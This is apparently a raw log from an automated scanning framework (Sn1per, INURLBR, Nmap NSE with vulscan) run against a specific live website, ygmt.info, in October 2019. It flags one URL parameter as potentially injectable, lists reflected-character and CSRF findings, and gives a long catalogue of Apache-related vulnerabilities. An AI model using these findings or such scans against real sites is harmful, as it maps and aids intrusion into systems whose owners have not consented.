10678|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=65&go=1 ]
10679|_[ + ] Exploit::
10680|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10681|_[ + ] More details:: / - / , ISP:
10682|_[ + ] Found:: UNIDENTIFIED
10683
10684 _[ - ]::--------------------------------------------------------------------------------------------------------------
10685|_[ + ] [ 72 / 100 ]-[00:23:59] [ - ]
10686|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=100&all_reviews=1 ]
10687|_[ + ] Exploit::
10688|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10689|_[ + ] More details:: / - / , ISP:
10690|_[ + ] Found:: UNIDENTIFIED
10691
10692 _[ - ]::--------------------------------------------------------------------------------------------------------------
10693|_[ + ] [ 73 / 100 ]-[00:24:00] [ - ]
10694|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=39&go=1 ]
10695|_[ + ] Exploit::
10696|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10697|_[ + ] More details:: / - / , ISP:
10698|_[ + ] Found:: UNIDENTIFIED
10699
10700 _[ - ]::--------------------------------------------------------------------------------------------------------------
10701|_[ + ] [ 74 / 100 ]-[00:24:01] [ - ]
10702|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=57&all_reviews=1 ]
10703|_[ + ] Exploit::
10704|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10705|_[ + ] More details:: / - / , ISP:
10706|_[ + ] Found:: UNIDENTIFIED
10707
10708 _[ - ]::--------------------------------------------------------------------------------------------------------------
10709|_[ + ] [ 75 / 100 ]-[00:24:01] [ - ]
10710|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=104&all_reviews=1 ]
10711|_[ + ] Exploit::
10712|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10713|_[ + ] More details:: / - / , ISP:
10714|_[ + ] Found:: UNIDENTIFIED
10715
10716 _[ - ]::--------------------------------------------------------------------------------------------------------------
10717|_[ + ] [ 76 / 100 ]-[00:24:02] [ - ]
10718|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=25&all_reviews=1 ]
10719|_[ + ] Exploit::
10720|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10721|_[ + ] More details:: / - / , ISP:
10722|_[ + ] Found:: UNIDENTIFIED
10723
10724 _[ - ]::--------------------------------------------------------------------------------------------------------------
10725|_[ + ] [ 77 / 100 ]-[00:24:03] [ - ]
10726|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=23&all_reviews=1 ]
10727|_[ + ] Exploit::
10728|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10729|_[ + ] More details:: / - / , ISP:
10730|_[ + ] Found:: UNIDENTIFIED
10731
10732 _[ - ]::--------------------------------------------------------------------------------------------------------------
10733|_[ + ] [ 78 / 100 ]-[00:24:04] [ - ]
10734|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=8&all_reviews=1 ]
10735|_[ + ] Exploit::
10736|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10737|_[ + ] More details:: / - / , ISP:
10738|_[ + ] Found:: UNIDENTIFIED
10739
10740 _[ - ]::--------------------------------------------------------------------------------------------------------------
10741|_[ + ] [ 79 / 100 ]-[00:24:04] [ - ]
10742|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=1&all_reviews=1 ]
10743|_[ + ] Exploit::
10744|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10745|_[ + ] More details:: / - / , ISP:
10746|_[ + ] Found:: UNIDENTIFIED
10747
10748 _[ - ]::--------------------------------------------------------------------------------------------------------------
10749|_[ + ] [ 80 / 100 ]-[00:24:05] [ - ]
10750|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=43&all_reviews=1 ]
10751|_[ + ] Exploit::
10752|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10753|_[ + ] More details:: / - / , ISP:
10754|_[ + ] Found:: UNIDENTIFIED
10755
10756 _[ - ]::--------------------------------------------------------------------------------------------------------------
10757|_[ + ] [ 81 / 100 ]-[00:24:06] [ - ]
10758|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=47&all_reviews=1 ]
10759|_[ + ] Exploit::
10760|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10761|_[ + ] More details:: / - / , ISP:
10762|_[ + ] Found:: UNIDENTIFIED
10763
10764 _[ - ]::--------------------------------------------------------------------------------------------------------------
10765|_[ + ] [ 82 / 100 ]-[00:24:07] [ - ]
10766|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=out&u=93&go=1 ]
10767|_[ + ] Exploit::
10768|_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10769|_[ + ] More details:: / - / , ISP:
10770|_[ + ] Found:: UNIDENTIFIED
10771
10772 _[ - ]::--------------------------------------------------------------------------------------------------------------
10773|_[ + ] [ 83 / 100 ]-[00:24:07] [ - ]
10774|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=91&all_reviews=1 ]
10775|_[ + ] Exploit::
10776|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10777|_[ + ] More details:: / - / , ISP:
10778|_[ + ] Found:: UNIDENTIFIED
10779
10780 _[ - ]::--------------------------------------------------------------------------------------------------------------
10781|_[ + ] [ 84 / 100 ]-[00:24:08] [ - ]
10782|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=93&all_reviews=1 ]
10783|_[ + ] Exploit::
10784|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10785|_[ + ] More details:: / - / , ISP:
10786|_[ + ] Found:: UNIDENTIFIED
10787
10788 _[ - ]::--------------------------------------------------------------------------------------------------------------
10789|_[ + ] [ 85 / 100 ]-[00:24:09] [ - ]
10790|_[ + ] Target:: [ https://www.ygmt.info/top/index.php?a=stats&u=99&all_reviews=1 ]
10791|_[ + ] Exploit::
10792|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:443
10793|_[ + ] More details:: / - / , ISP:
10794|_[ + ] Found:: UNIDENTIFIED
10795
10796 _[ - ]::--------------------------------------------------------------------------------------------------------------
10797|_[ + ] [ 86 / 100 ]-[00:24:10] [ - ]
10798|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=66&all_reviews=1 ]
10799|_[ + ] Exploit::
10800|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10801|_[ + ] More details:: / - / , ISP:
10802|_[ + ] Found:: UNIDENTIFIED
10803
10804 _[ - ]::--------------------------------------------------------------------------------------------------------------
10805|_[ + ] [ 87 / 100 ]-[00:24:11] [ - ]
10806|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=37&all_reviews=1 ]
10807|_[ + ] Exploit::
10808|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10809|_[ + ] More details:: / - / , ISP:
10810|_[ + ] Found:: UNIDENTIFIED
10811
10812 _[ - ]::--------------------------------------------------------------------------------------------------------------
10813|_[ + ] [ 88 / 100 ]-[00:24:11] [ - ]
10814|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=19&all_reviews=1 ]
10815|_[ + ] Exploit::
10816|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10817|_[ + ] More details:: / - / , ISP:
10818|_[ + ] Found:: UNIDENTIFIED
10819
10820 _[ - ]::--------------------------------------------------------------------------------------------------------------
10821|_[ + ] [ 89 / 100 ]-[00:24:12] [ - ]
10822|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=39&all_reviews=1 ]
10823|_[ + ] Exploit::
10824|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10825|_[ + ] More details:: / - / , ISP:
10826|_[ + ] Found:: UNIDENTIFIED
10827
10828 _[ - ]::--------------------------------------------------------------------------------------------------------------
10829|_[ + ] [ 90 / 100 ]-[00:24:13] [ - ]
10830|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=30&all_reviews=1 ]
10831|_[ + ] Exploit::
10832|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10833|_[ + ] More details:: / - / , ISP:
10834|_[ + ] Found:: UNIDENTIFIED
10835
10836 _[ - ]::--------------------------------------------------------------------------------------------------------------
10837|_[ + ] [ 91 / 100 ]-[00:24:14] [ - ]
10838|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=33&all_reviews=1 ]
10839|_[ + ] Exploit::
10840|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10841|_[ + ] More details:: / - / , ISP:
10842|_[ + ] Found:: UNIDENTIFIED
10843
10844 _[ - ]::--------------------------------------------------------------------------------------------------------------
10845|_[ + ] [ 92 / 100 ]-[00:24:14] [ - ]
10846|_[ + ] Target:: [ http://www.ygmt.info/top/index.php?a=stats&u=44&all_reviews=1 ]
10847|_[ + ] Exploit::
10848|_[ + ] Information Server:: HTTP/1.1 404 Not Found, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10849|_[ + ] More details:: / - / , ISP:
10850|_[ + ] Found:: UNIDENTIFIED
10851
10852 _[ - ]::--------------------------------------------------------------------------------------------------------------
10853|_[ + ] [ 93 / 100 ]-[00:24:15] [ - ]
10854|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=14&all_reviews=1 ]
10855|_[ + ] Exploit::
10856|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10857|_[ + ] More details:: / - / , ISP:
10858|_[ + ] Found:: UNIDENTIFIED
10859
10860 _[ - ]::--------------------------------------------------------------------------------------------------------------
10861|_[ + ] [ 94 / 100 ]-[00:24:16] [ - ]
10862|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=59&all_reviews=1 ]
10863|_[ + ] Exploit::
10864|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10865|_[ + ] More details:: / - / , ISP:
10866|_[ + ] Found:: UNIDENTIFIED
10867
10868 _[ - ]::--------------------------------------------------------------------------------------------------------------
10869|_[ + ] [ 95 / 100 ]-[00:24:18] [ - ]
10870|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=42&all_reviews=1 ]
10871|_[ + ] Exploit::
10872|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10873|_[ + ] More details:: / - / , ISP:
10874|_[ + ] Found:: UNIDENTIFIED
10875
10876 _[ - ]::--------------------------------------------------------------------------------------------------------------
10877|_[ + ] [ 96 / 100 ]-[00:24:19] [ ! ]
10878|_[ + ] Target:: [ ( POTENTIALLY VULNERABLE ) http://www.ygmt.info/top50/index.php?a=stats&u=61&all_reviews=1 ]
10879|_[ + ] Exploit::
10880|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10881|_[ + ] More details:: / - / , ISP:
10882|_[ + ] Found:: ORACLE-03 - VALUE: ORA-
10883|_[ + ] VALUE SAVED IN THE FILE:: inurlbr-www.ygmt.info
10884
10885 _[ - ]::--------------------------------------------------------------------------------------------------------------
10886|_[ + ] [ 97 / 100 ]-[00:24:19] [ - ]
10887|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=20&all_reviews=1 ]
10888|_[ + ] Exploit::
10889|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10890|_[ + ] More details:: / - / , ISP:
10891|_[ + ] Found:: UNIDENTIFIED
10892
10893 _[ - ]::--------------------------------------------------------------------------------------------------------------
10894|_[ + ] [ 98 / 100 ]-[00:24:20] [ - ]
10895|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=15&all_reviews=1 ]
10896|_[ + ] Exploit::
10897|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10898|_[ + ] More details:: / - / , ISP:
10899|_[ + ] Found:: UNIDENTIFIED
10900
10901 _[ - ]::--------------------------------------------------------------------------------------------------------------
10902|_[ + ] [ 99 / 100 ]-[00:24:21] [ - ]
10903|_[ + ] Target:: [ http://www.ygmt.info/top50/index.php?a=stats&u=75&all_reviews=1 ]
10904|_[ + ] Exploit::
10905|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.4.10 (Debian) , IP:185.82.200.52:80
10906|_[ + ] More details:: / - / , ISP:
10907|_[ + ] Found:: UNIDENTIFIED
10908
10909[ INFO ] [ Shutting down ]
10910[ INFO ] [ End of process INURLBR at [06-10-2019 00:24:21]
10911[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 3 ]
10912[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.ygmt.info/output/inurlbr-www.ygmt.info ]
10913|_________________________________________________________________________________________
10914http://www.ygmt.info/top50/index.php?a=stats&u=34
10915http://www.ygmt.info/top50/index.php?a=stats&u=60
10916http://www.ygmt.info/top50/index.php?a=stats&u=61&all_reviews=1
10917
10918\_________________________________________________________________________________________/
10919#######################################################################################################################################
10920Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:24 EDT
10921NSE: Loaded 164 scripts for scanning.
10922NSE: Script Pre-scanning.
10923Initiating NSE at 00:24
10924Completed NSE at 00:24, 0.00s elapsed
10925Initiating NSE at 00:24
10926Completed NSE at 00:24, 0.00s elapsed
10927Initiating Parallel DNS resolution of 1 host. at 00:24
10928Completed Parallel DNS resolution of 1 host. at 00:24, 0.02s elapsed
10929Initiating SYN Stealth Scan at 00:24
10930Scanning www.ygmt.info (185.82.200.52) [1 port]
10931Discovered open port 443/tcp on 185.82.200.52
10932Completed SYN Stealth Scan at 00:24, 0.14s elapsed (1 total ports)
10933Initiating Service scan at 00:24
10934Scanning 1 service on www.ygmt.info (185.82.200.52)
10935Completed Service scan at 00:24, 12.84s elapsed (1 service on 1 host)
10936Initiating OS detection (try #1) against www.ygmt.info (185.82.200.52)
10937Retrying OS detection (try #2) against www.ygmt.info (185.82.200.52)
10938Initiating Traceroute at 00:24
10939Completed Traceroute at 00:24, 0.16s elapsed
10940Initiating Parallel DNS resolution of 14 hosts. at 00:24
10941Completed Parallel DNS resolution of 14 hosts. at 00:24, 0.22s elapsed
10942NSE: Script scanning 185.82.200.52.
10943Initiating NSE at 00:24
10944Completed NSE at 00:26, 77.00s elapsed
10945Initiating NSE at 00:26
10946Completed NSE at 00:26, 1.43s elapsed
10947Nmap scan report for www.ygmt.info (185.82.200.52)
10948Host is up (0.13s latency).
10949rDNS record for 185.82.200.52: latina.petite.guru
10950
10951PORT STATE SERVICE VERSION
10952443/tcp open ssl/ssl Apache httpd (SSL-only mode)
10953| http-brute:
10954|_ Path "/" does not require authentication
10955|_http-chrono: Request times for /; avg: 1163.27ms; min: 998.36ms; max: 1344.23ms
10956| http-csrf:
10957| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
10958| Found the following possible CSRF vulnerabilities:
10959|
10960| Path: https://www.ygmt.info:443/top50/index.php
10961| Form id:
10962| Form action: index.php
10963|
10964| Path: https://www.ygmt.info:443/top50/index.php
10965| Form id:
10966| Form action: index.php
10967|
10968| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
10969| Form id:
10970| Form action: index.php
10971|
10972| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
10973| Form id:
10974| Form action: index.php
10975|
10976| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
10977| Form id:
10978| Form action: index.php
10979|
10980| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
10981| Form id:
10982| Form action: index.php
10983|
10984| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
10985| Form id:
10986| Form action: index.php
10987|
10988| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
10989| Form id:
10990| Form action: index.php
10991|
10992| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
10993| Form id:
10994| Form action: index.php
10995|
10996| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
10997| Form id:
10998| Form action: index.php
10999|
11000| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
11001| Form id:
11002| Form action: index.php
11003|
11004| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
11005| Form id:
11006| Form action: index.php
11007|
11008| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
11009| Form id:
11010| Form action: index.php
11011|
11012| Path: https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
11013| Form id:
11014|_ Form action: index.php
11015|_http-date: Sun, 06 Oct 2019 04:24:54 GMT; -4s from local time.
11016|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
11017|_http-dombased-xss: Couldn't find any DOM based XSS.
11018|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
11019| http-errors:
11020| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
11021| Found the following error pages:
11022|
11023| Error Code: 404
11024| https://www.ygmt.info:443/android-app:/
11025|
11026| Error Code: 404
11027| https://www.ygmt.info:443/url;
11028|
11029| Error Code: 404
11030|_ https://www.ygmt.info:443/top50/android-app:/
11031|_http-feed: Couldn't find any feeds.
11032|_http-fetch: Please enter the complete path of the directory to save data in.
11033| http-headers:
11034| Date: Sun, 06 Oct 2019 04:24:53 GMT
11035| Server: Apache/2.4.10 (Debian)
11036| Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
11037| ETag: "a0d-583eebde65fc0"
11038| Accept-Ranges: bytes
11039| Content-Length: 2573
11040| Vary: Accept-Encoding
11041| Connection: close
11042| Content-Type: text/html
11043|
11044|_ (Request type: HEAD)
11045|_http-jsonp-detection: Couldn't find any JSONP endpoints.
11046|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
11047| http-methods:
11048|_ Supported Methods: GET HEAD POST OPTIONS
11049|_http-mobileversion-checker: No mobile version detected.
11050| http-php-version: Logo query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
11051|_Credits query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
11052| http-security-headers:
11053| Strict_Transport_Security:
11054|_ HSTS not configured in HTTPS Server
11055|_http-server-header: Apache/2.4.10 (Debian)
11056| http-sitemap-generator:
11057| Directory structure:
11058| /
11059| Other: 1; ico: 1
11060| /bn/
11061| jpg: 3; png: 1
11062| /top50/
11063| php: 1
11064| /top50/css/
11065| css: 1
11066| /top50/js/
11067| js: 4
11068| Longest directory structure:
11069| Depth: 2
11070| Dir: /top50/js/
11071| Total files found (by extension):
11072|_ Other: 1; css: 1; ico: 1; jpg: 3; js: 4; php: 1; png: 1
11073|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
11074|_http-title: 400 Bad Request
11075| http-unsafe-output-escaping:
11076| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Top+Lists&start=1
11077| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Nonude+Sites&start=1
11078| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Pay+Sites&start=1
11079| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Book+Stores&start=1
11080| Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Free+Sites&start=1
11081|_ Characters [> " '] reflected in parameter cat at https://www.ygmt.info:443/top50/index.php?method=in&cat=Security&start=1
11082| http-vhosts:
11083| 126 names had status 400
11084|_www.ygmt.info : 200
11085|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
11086|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
11087|_http-xssed: No previously reported XSS vuln.
11088| vulscan: VulDB - https://vuldb.com:
11089| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
11090| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
11091| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
11092| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
11093| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
11094| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
11095| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
11096| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
11097| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
11098| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
11099| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
11100| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
11101| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
11102| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
11103| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
11104| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
11105| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
11106| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
11107| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
11108| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
11109| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
11110| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
11111| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
11112| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
11113| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
11114| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
11115| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
11116| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
11117| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
11118| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
11119| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
11120| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
11121| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
11122| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
11123| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
11124| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
11125| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
11126| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
11127| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
11128| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
11129| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
11130| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
11131| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
11132| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
11133| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
11134| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
11135| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
11136| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
11137| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
11138| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
11139| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
11140| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
11141| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
11142| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
11143| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
11144| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
11145| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
11146| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
11147| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
11148| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
11149| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
11150| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
11151| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
11152| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
11153| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
11154| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
11155| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
11156| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
11157| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
11158| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
11159| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
11160| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
11161| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
11162| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
11163| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
11164| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
11165| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
11166| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
11167| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
11168| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
11169| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
11170| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
11171| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
11172| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
11173| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
11174| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
